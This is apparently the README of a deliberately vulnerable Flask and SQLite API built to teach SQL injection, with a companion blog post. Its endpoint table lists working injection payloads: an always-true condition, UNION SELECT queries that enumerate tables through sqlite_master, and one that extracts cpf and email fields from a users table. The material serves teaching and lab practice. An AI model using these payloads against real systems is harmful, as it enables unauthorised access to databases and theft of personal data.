Skip to content

Latest commit

 

History

History
23 lines (16 loc) · 3.55 KB

README.md

File metadata and controls

23 lines (16 loc) · 3.55 KB

Flask Vulnerable to SQL Injection 💉🔓

Code style: black try/except style: tryceratops Open in Visual Studio Code


The purpose of this repository is to allow us to explore an API vulnerable to SQL Injection (using Python, Flask, and SQLite).

You're free to play with it as is, but you might have more fun doing it alongside me in a blog post: https://blog.guilatrova.dev/how-sql-injection-attack-works-with-examples/.

Open in Gitpod

You can play with the following endpoints (considering you're running on localhost):

Endpoint Description
/challenges/111.111.111-11 Expected usage
/challenges/' or '1' = '1 Vulnerability proof
/challenges/' AND '1' = '2' UNION SELECT name FROM sqlite_master WHERE type ='table' AND name NOT LIKE 'sqlite_% Breaks server
/challenges/' AND '1' = '2' UNION SELECT 'table_name', name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_% Queries all tables and fixes broken server
/challenges/' AND '1' = '2' UNION SELECT cpf, email FROM users; -- Use union select to query data from other tables